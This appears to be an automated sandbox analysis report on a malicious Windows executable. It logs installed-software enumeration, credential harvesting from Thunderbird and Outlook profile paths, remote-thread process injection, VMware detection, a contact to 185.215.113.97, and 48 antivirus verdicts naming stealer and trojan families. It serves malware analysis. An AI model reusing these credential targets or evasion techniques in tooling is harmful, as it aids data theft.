RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExA March 8, 2025, 12:08 p.m.	key_handle: 0x000003dc regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Harvests credentials from local email clients (3 events)

file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\SMTP Server
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\SMTP Server

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1800 resumed a thread in remote process 1972
NtResumeThread March 8, 2025, 12:09 p.m.	thread_handle: 0x0000013c suspend_count: 0 process_identifier: 1972	1	0	0

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ March 8, 2025, 12:08 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 56 54 e9 78 09 00 00 bb exception.symbol: 1n22o8+0x1faff4 exception.instruction: in eax, dx exception.module: 1N22O8.exe exception.exception_code: 0xc0000096 exception.offset: 2076660 exception.address: 0x40aff4 registers.esp: 2162012 registers.edi: 10498088 registers.eax: 1447909480 registers.ebp: 3992645652 registers.edx: 22104 registers.ebx: 1971327157 registers.esi: 4229001 registers.ecx: 20	1	0	0

Generates some ICMP traffic

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

185.215.113.97:80

File has been identified by 48 AntiVirus engines on VirusTotal as malicious (48 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Cynet	Malicious (score: 99)
CAT-QuickHeal	Trojan.Ghanarava.1741391711d0c3c0
Skyhigh	BehavesLike.Win32.AgentTesla.tc
Cylance	Unsafe
VIPRE	Gen:Heur.Crifi.1
Sangfor	Trojan.Win32.Save.a
CrowdStrike	win/malicious_confidence_100% (W)
BitDefender	Gen:Heur.Crifi.1
Arcabit	Trojan.Crifi.1
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Win32/Packed.Themida.HZB
APEX	Malicious
Avast	Win32:AdwareX-gen [Adw]
ClamAV	Win.Packed.Disabler-10009296-0
Kaspersky	UDS:Trojan.Win32.Generic
Alibaba	TrojanDownloader:Win32/Strab.12849834
MicroWorld-eScan	Gen:Heur.Crifi.1
Rising	Trojan.Agent!1.10760 (CLASSIC)
Emsisoft	Gen:Heur.Crifi.1 (B)
F-Secure	Trojan.TR/Crypt.TPM.Gen
DrWeb	Trojan.Packed2.48355
Zillya	Trojan.AgentGen.Win32.94
McAfeeD	ti!D53213608278
Trapmine	malicious.moderate.ml.score
CTX	exe.unknown.crifi
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious SFX
FireEye	Generic.mg.4677605b34f1e7f4
Google	Detected
Avira	TR/Crypt.TPM.Gen
Kingsoft	Win32.Trojan.Generic.a
Gridinsoft	Spy.Win32.Redline.lu!heur
Microsoft	Trojan:Win32/Vigorf.A
GData	Gen:Heur.Crifi.1
Varist	W32/Kryptik.JKR.gen!Eldorado
McAfee	Artemis!CE7FC75DAB76
DeepInstinct	MALICIOUS
Malwarebytes	Disabler.Trojan.MSIL.DDS
Ikarus	Trojan.MSIL.Disabler
Zoner	Probably Heur.ExeHeaderL
Tencent	Win32.Trojan.Deyma.Vimw
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Themida.HZB!tr
AVG	Win32:AdwareX-gen [Adw]
alibabacloud	Trojan:Win/Wacatac.B9nj

download.php

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All